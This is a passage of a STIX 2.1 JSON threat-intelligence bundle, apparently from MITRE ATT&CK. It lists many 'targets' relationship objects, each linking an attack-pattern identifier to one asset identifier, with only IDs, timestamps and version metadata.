"revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817386", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c9db3ffd-3176-47e5-9275-89a10ee3b723", "created": "2024-07-01T10:37:15.817394", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817396", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--305f597a-fc88-4dca-9678-fcf8bf146714", "created": "2024-07-01T10:37:15.817405", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817407", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2d91bbbc-047f-4963-99ab-d06c18de7937", "created": "2024-07-01T10:37:15.817415", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817417", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2385b28b-9937-4f13-935e-e8d914988bbb", "created": "2024-07-01T10:37:15.817425", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817427", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0848dd42-49bc-4270-ad0a-064ffdb59c2b", "created": "2024-07-01T10:37:15.817435", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817437", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--22522668-ddf6-470b-a027-9d6866679f67", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fca5f057-bdfb-4e64-85a8-d3433abd745d", "created": "2024-07-01T10:37:15.817445", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817448", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--40ab205b-022a-4a25-9aed-3f72dbc90ff9", "created": "2024-07-01T10:37:15.817456", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817458", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7abbbedd-2dca-4719-bcb7-834edab09f0e", "created": "2024-07-01T10:37:15.817466", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817468", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5f84c1a1-2391-45e9-afcf-793cdcabd838", "created": "2024-07-01T10:37:15.817476", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817478", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--83f9b535-1680-43fb-adb3-4d1af65777f2", "created": "2024-07-01T10:37:15.817486", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817488", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a29022b0-dd7f-45b2-83e8-4f3342caf222", "created": "2024-07-01T10:37:15.817496", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817499", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6741caf1-61e2-49c6-8070-48c61f47a25e", "created": "2024-07-01T10:37:15.817507", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817509", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7c3c00bf-9345-4023-a37c-de6afae930dd", "created": "2024-07-01T10:37:15.817517", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817519", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--28170e17-8384-415c-8486-2e6b294cb803", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--37005cc7-7bb3-4de3-80f9-ff2551d5e541", "created": "2024-07-01T10:37:15.817528", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817530", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0b7ab4d8-7621-4b07-b1d7-be401b026029", "created": "2024-07-01T10:37:15.817538", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817540", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--50a78ac2-e758-4843-8c88-48c612f29c0e", "created": "2024-07-01T10:37:15.817548", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817550", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0b7318b6-3e2a-49c8-aa17-1c474941b29a", "created": "2024-07-01T10:37:15.817559", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817561", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e9577fc0-4134-4bd0-95c8-2474075df6ca", "created": "2024-07-01T10:37:15.817569", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817571", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d3e28d83-991f-4d91-ad00-b578e97739a6", "created": "2024-07-01T10:37:15.817579", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817581", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--27def180-f6bd-4503-b5fe-94c379315239", "created": "2024-07-01T10:37:15.817589", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817592", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c2dc9128-9a07-41d2-a6e5-3627b5b83096", "created": "2024-07-01T10:37:15.817600", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817602", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9d2ab1bd-7aa9-462b-ac82-574c075ba958", "created": "2024-07-01T10:37:15.817610", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817612", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cee4a13c-1d9f-43d5-b98c-c528312637c1", "created": "2024-07-01T10:37:15.817620", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817622", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7faa9780-a1a8-443f-b6d4-8b01249e6cae", "created": "2024-07-01T10:37:15.817631", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817633", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--32c9e403-2f5d-4db7-a90d-e83bca29ce7e", "created": "2024-07-01T10:37:15.817641", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817643", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1e612562-e80e-4cf5-8b3a-b821d02b6fa2", "created": "2024-07-01T10:37:15.817651", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817653", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c973b3e6-7700-47aa-857e-75cf1d3527a0", "created": "2024-07-01T10:37:15.817661", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817664", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--067debd3-e1ec-4b0e-8a58-161a11b86253", "created": "2024-07-01T10:37:15.817672", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817674", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3d176bd3-a727-4a90-8d65-41d236403741", "created": "2024-07-01T10:37:15.817682", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817684", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b7bc2437-46d6-4f23-88fa-3e46cd9e099e", "created": "2024-07-01T10:37:15.817692", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817694", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6315ca62-80a7-40aa-a5cd-ee0e8bcb0ffa", "created": "2024-07-01T10:37:15.817702", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817705", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--06a7c21c-7573-43a3-9e8f-08fb1fab3f8a", "created": "2024-07-01T10:37:15.817713", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817715", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--25cabc5c-b99e-4512-a5ff-4607cedb7494", "created": "2024-07-01T10:37:15.817723", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817725", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5e6f356a-3654-47ee-b286-982660bcb914", "created": "2024-07-01T10:37:15.817733", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817735", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b32310da-43db-4d91-b590-79237bdbc2ce", "created": "2024-07-01T10:37:15.817743", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817746", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6ee0344c-de6f-44ed-817a-eab1569b77bf", "created": "2024-07-01T10:37:15.817753", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817756", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6cc519eb-6675-403d-b34f-09422cc5bc31", "created": "2024-07-01T10:37:15.817764", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817766", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ab1b5af-fd07-48fd-be71-0dcbee02e25a", "created": "2024-07-01T10:37:15.817774", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817776", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5e17be77-0ec3-41f9-82cf-bb4dbd54cb80", "created": "2024-07-01T10:37:15.817784", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817786", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--02e6ac17-8f0a-41ad-8d53-9530b95b9211", "created": "2024-07-01T10:37:15.817794", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817796", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4d1007a2-9757-4a0a-95c8-9f7d046973fd", "created": "2024-07-01T10:37:15.817804", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817806", "description": 